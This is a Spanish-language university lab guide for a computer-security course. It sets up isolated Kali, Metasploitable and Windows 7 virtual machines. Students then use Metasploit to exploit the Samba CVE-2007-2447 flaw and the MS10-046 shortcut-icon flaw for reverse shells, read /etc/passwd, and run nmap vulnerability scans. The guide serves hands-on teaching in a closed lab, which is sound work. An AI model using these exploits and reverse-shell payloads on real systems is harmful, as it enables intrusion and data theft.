Implementación EPA
Subdirección de Diseño instruccional
SEGURIDAD EN
Nombre de
ASY613 SISTEMAS Tiemp
Sigla Asignatura la 2h
1 COMPUTACIONA o
Asignatura
LES
Experiencia de Aprendizaje N° 3 Explorando vulnerabilidades
Explotación de Vulnerabilidades
Actividad N° 3.2
Nombre del Recurso Didáctico 3.2.2 Actividad de Explotación de Vulnerabilidades
1. Aprendizajes e indicadores de logro
Aprendizajes (Procedimentales, Indicadores de logro
Actitudinales y conceptuales)
Utilizar mecanismos y herramientas de ● Aplica técnicas de escaneo de vulnerabilidades para
seguridad informática para cumplir normas garantizar la seguridad de la solución requerida por la
y buenas prácticas de la industria a través organización.
de un plan de mitigación de ● Detecta las potenciales vulnerabilidades del software para
vulnerabilidades. proporcionar una solución en los niveles de seguridad que
requiere la organización.
● Es autocrítico en la revisión del cumplimiento de las normas
Desarrollar el autoaprendizaje y la
y buenas prácticas en el ámbito de ciber seguridad.
rigurosidad en la aplicación y cumplimiento
● Indaga en diversas fuentes información abierta sobre
de las normas y buenas prácticas en el
vulnerabilidades que afectan el desarrollo de software y la
ámbito de ciber seguridad.
infraestructura tecnológica.
Reconocer estándares de seguridad para la ● Reconoce los estándares y buenas prácticas asociadas a
aplicación en el desarrollo de software a fin ciberseguridad, necesarias para el desarrollo de código
de mitigar las vulnerabilidades posibles de seguro.
explotar en su fase de operación. ● Reconoce buenas prácticas relacionadas a ciberseguridad,
para el desarrollo de código seguro.
● Identifica las vulnerabilidades del software para el
desarrollo seguro en el marco de la solución requerida por
la organización.
1. Descripción general actividad
Esta es una actividad de carácter formativo de elaborar una política de desarrollo seguro revisando
metodologías de desarrollo seguro que son relevantes para la asignatura y su carrera.
En esta actividad el estudiante adquiere las competencias para realizar la instalación de herramientas de
análisis de vulnerabilidades y realizar hacking de aplicaciones y Sistemas Operativos
Metasploit es una de las herramientas más utilizadas en el mundo del pentesting. Metasploitable es una
máquina creada para practicar habilidades de penetración de sistemas.
Instrucciones:
1. Este trabajo se ejecutará de forma grupal con los mismos grupos ya establecidos
2. Para desarrollar esta actividad deberás disponer de pc e internet.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
2. Instrucciones
En parejas, deberán utilizar las máquinas virtuales del laboratorio, y posteriormente realizar las actividades
que se proponen.
Máquinas Necesarias:
• Máquina Virtual Windows 7
• Máquina Virtual Metasploitable
• Máquina Virtual Kali Linux
3. Actividad
FUENTES:
Disco Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Página de Metasploit:
https://www.metasploit.com/
Manual de uso y referencias de Metasploit:
https://docs.metasploit.com/
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
PREPARACIÓN:
METASPLOITED
1.1 Construcción máquina:
Importante: Si la máquina METASPLOITED está ya construida en virtualbox, puede saltarse este paso y aplicar
directamente la configuración de red en el paso1.2
En virtual box seleccione crear nueva máquina virtual:
Asigne nombre, sistema tipo linux y versión ubuntu 64 bits a la máquina.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Siga los pasos del proceso hasta el final sin modificar nada y seleccione “Terminar”
Cargue el disco duro de metasploitable a la máquina, si lo descargó desde internet lo encontrará en la carpeta
de descargas (El link se encuentra en la sección superior de FUENTES)
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Utilice la opción seleccionar/crear un disco duro virtual.
Aquí utilice la opción “AÑADIR”, busque el disco duro, agréguelo y luego confirme con CHOOSE:
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
1.2 Configuración de red:
Asegúrese de que la máquina METASPLOITED tiene solo una (1) tarjeta de red y que esta se encuentra en
modo red interna:
Inicie la máquina:
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Metasploit le indicará cuales son las credenciales, es normal que al ingresar la contraseña el sistema no muestra
ningún registro al teclear en el teclado.
Ingrese en orden los siguientes comandos:
1. sudo su (confirme utilizando la misma clave que usó para iniciar sesión en el sistema)
2. ifconfig eth0 192.168.100.50 netmask 255.255.255.0
3. route add default gw 192.168.100.1 eth0
Importante: si bien puede utilizar otra configuración de red, se recomienda que utilice la sugerida por la guía
para evitar posibles problemas de enrutamiento.
Puede verificar la configuración que acaba de realizar utilizando los comandos netstat e ifconfig:
ifconfig eth0
netstat -nr
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
WINDOWS 7
Configure al máquina Windows 7 de virtual box con una interfaz de red en modo red interna:
Inicie la máquina de Windows 7.
En la máquina virtual de Windows 7, abra la ventana de ejecución utilizando las teclas WIN+R e ingrese la
orden:
ncpa.cpl
Si no puede abrir la ventana de ejecución, ábrala desde la barra de Windows:
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Haga click derecho sobre la conexión de red local y seleccione propiedades:
Configure la conexión de red utilizando los parámetros mostrados en la imagen.
IMPORTANTE: Se recomienda utilizar el direccionamiento IP del ejemplo. Si quiere utilizar otros parámetros de
red, asegúrese de que está utilizando el mismo segmento de red que utiliza para metasploitable y Kali.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
KALI LINUX:
Configure KALI LINUX con SOLO UN (desactive los demás) adaptador de red en modo red interna y luego inicie
la máquina virtual.
Desactive la red de Kali. Para ello, haga click derecho sobre la configuración de red y desactive el networking:
Luego, ingrese a la edición de conexiones haciendo click derecho sobre las redes:
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Ingrese al adaptador de red haciendo click sobre él:
En la ventana ethernet seleccione en DEVICE el adaptador de red eth0:
En IPV4 Settings, seleccione el modo manual y configure los parámetros de red según la imagen, luego presione
GUARDAR:
Importante:
IMPORTANTE: Se recomienda utilizar el direccionamiento IP del ejemplo. Si quiere utilizar otros parámetros de
red, asegúrese de que está utilizando el mismo segmento de red que utiliza para metasploitable y Windows7.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
COMPROBACIÓN DE CONECTIVIDAD:
Active nuevamente el direccionamiento de red y realice pings desde Kali hacia Windows 7 y hacia
metasploitable y asegúrese de que tiene conectividad:
SI NO TIENE CONECTIVIDAD; REVISE LOS PASOS DE CONFIGURACIÓN DE LAS MAQUINAS
VIRTUALES.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
METASPLOIT:
Metasploit funciona a través de una base de datos publicada en postgre.
Puede verificar el estado del servicio postgre utilizando los siguientes comandos:
systemctl status postgresql
El servicio puede ser manipulado con los siguientes comandos:
systemctl start postgresql = Inicia el servicio
systemctl stop postgresql = detiene el servicio
systemctl restart postgresql = reinicia el servicio
Inicie el servicio.
La base de datos de metasploit puede ser manipulada a través del comando msfdb y las siguientes opciones:
Verifique el estado de la base de datos de metasploit. Si está detenida, iníciela.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Los exploits y los payloads de metasploit se encuentran cargados usualmente en la ruta por defecto.
Puede acceder a ellos usando el Shell:
O utilizando el navegador de archivos de Linux.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Los EXPLOITS y los PAYLOADS se encuentran clasificados por SO y protocolo. Están escritos la
mayoría de las veces en RUBY. Si usted dispone de conocimiento suficiente, podría editar estos
archivos o utilizarlos como base para crear sus propios exploits.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Actividades:
Explotación de vulnerabilidades con Metasploit hacia Metasploitable – ACCESO NO AUTORIZADO:
1.- Inicie la aplicación Msfconsole utilizando el comando msfconsole: (la aplicación cargará un banner y pasará
a trabajar con la ejecución msfX, donde x es la versión activa de metasploit)
2.- Metasploit permite buscar vulnerabilidades y exploits a través de línea de comando. Pruebe buscar todo lo
relacionado a samba usando el comando :
search samba
Esta búsqueda puede afinarse aún más.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Busque la vulnerabilidad 2007-2447 con el comando search
Ahora que hemos encontrado el exploit, podemos ver su nombre (ruta), la fecha de publicación, un ranking de
clasificación y una breve descripción.
4.- Para poder usar el exploit, se debe cargar utilizando el comando USE junto con el nombre (ruta) del exploit:
use “ingresar-ruta”
Una carga exitosa nos mostrará ahora en rojo el nombre del exploit que estamos usando. Una carga fallida
deberá ser revisada y reintentada.
5.- Utilice los parámetros:
Todo exploit tiene una serie de parámetros que deben ser cargados. En este caso debemos cargar:
1. RHOST : dirección ip de la víctima
2. LHOST: dirección ip del atacante
3. RPORT: puerto a través del cual se realizará el ataque
4. PAYLOAD: código malicioso que se inyectará.
Puede ver los payloads a través del comando:
show payloads
Estos se cargan igual que el exploit, escribiendo la ruta.
Para este ataque utilizaremos el payload: cmd/unix/reverse, nuestro objetivo será la máquina metasploitable y
el puerto usado será el puerto 445. La máquina local es KALI LINUX
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Cuando haya terminado de establecer los parámetros, escriba “exploit” para iniciar el ataque.
El resultado muestra que se abrió una sesión Shell.
Digite los siguientes comandos y reflexione:
Ifconfig eth0 (cual es la dirección ip que se muestra? A qué máquina corresponde?)
cat /etc/fstab (Qué es lo que estamos viendo? Qué se podría hacer con esta información?)
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
cat /etc/passwd (Qué es lo que estamos viendo? Qué se podría hacer con esta información?)
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Actividades:
Explotación de vulnerabilidades con Metasploit y MALWARE hacia Windows 7 - PHISHING:
Importante: Dependiendo de la versión de Windows 7 cargada en la imagen de la que usted dispone en
virtual box, este ataque podría no funcionar.
Cargue en metasploit el exlpoit exploit/Windows/browser/ms10_046_shortcut_icon_dllloader
Cargue el payload windows/meterpreter/reverse_tcp
Configure las opciones SRVHOST y LHOST con la ip atacante (de Kali):
Verifique la configuración con show options, si todo está correcto arranque el exploit con EXPLOIT:
Si todo está configurado correctamente, debería recibir una configuración vía consola:
Ahora Kali ha iniciado un servidor web y está preparado para atacar a quien ingrese a ese servidor.
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Desde la máquina Windows 7 acceda al servidor web utilizando la dirección de Kali para visitarla en una página
web a través del puerto 80 usando el formato:
192.168.100.100:80
En cuanto haya ingresado desde el equipo Windows 7. Kali le notificará que la víctima ha sido infectada:
Verifique las sesiones abiertas utilizando el comando:
Sesión -l
Explote la inyección de malware utilizando el comando sessions -i x, donde x es el número de sesión a explotar.
En este caso, es la sesión 1
Arroje un “?” a la consola para ver los comandos disponibles en el sistema de la víctima:
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Ahora hay una conexión establecida con la víctima.
Pruebe ingresar los comandos:
sysinfo
getuid
whoami
¿Qué información devuelven los comandos?
(Si tras el acceso de la máquina Windows 7 al portal web no hay sesiones abiertas, el SO está parchado contra
la vulnerabilidad.)
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Actividades:
Escaneos de vulnerabilidad con NMAP – ANALISIS DE VULNERABILIDADES
Utilice la máquina metasploitable como victima y desde Kali lance los siguientes comandos:
nmap -f -sS -sV -Pn --script auth 192.168.100.50
Investigue sobre las vulnerabilidades presentes en el sistema:
A qué servicios corresponden?
Cómo pueden ser explotadas?
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano
Implementación EPA
Subdirección de Diseño instruccional
Lance el siguiente análisis de vulnerabilidades
nmap -f --script vuln 192.168.100.50
Investigue sobre las vulnerabilidades presentes en el sistema:
*esto es solo parte de los resultados
A qué servicios corresponden?
Cómo pueden ser explotadas?
Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano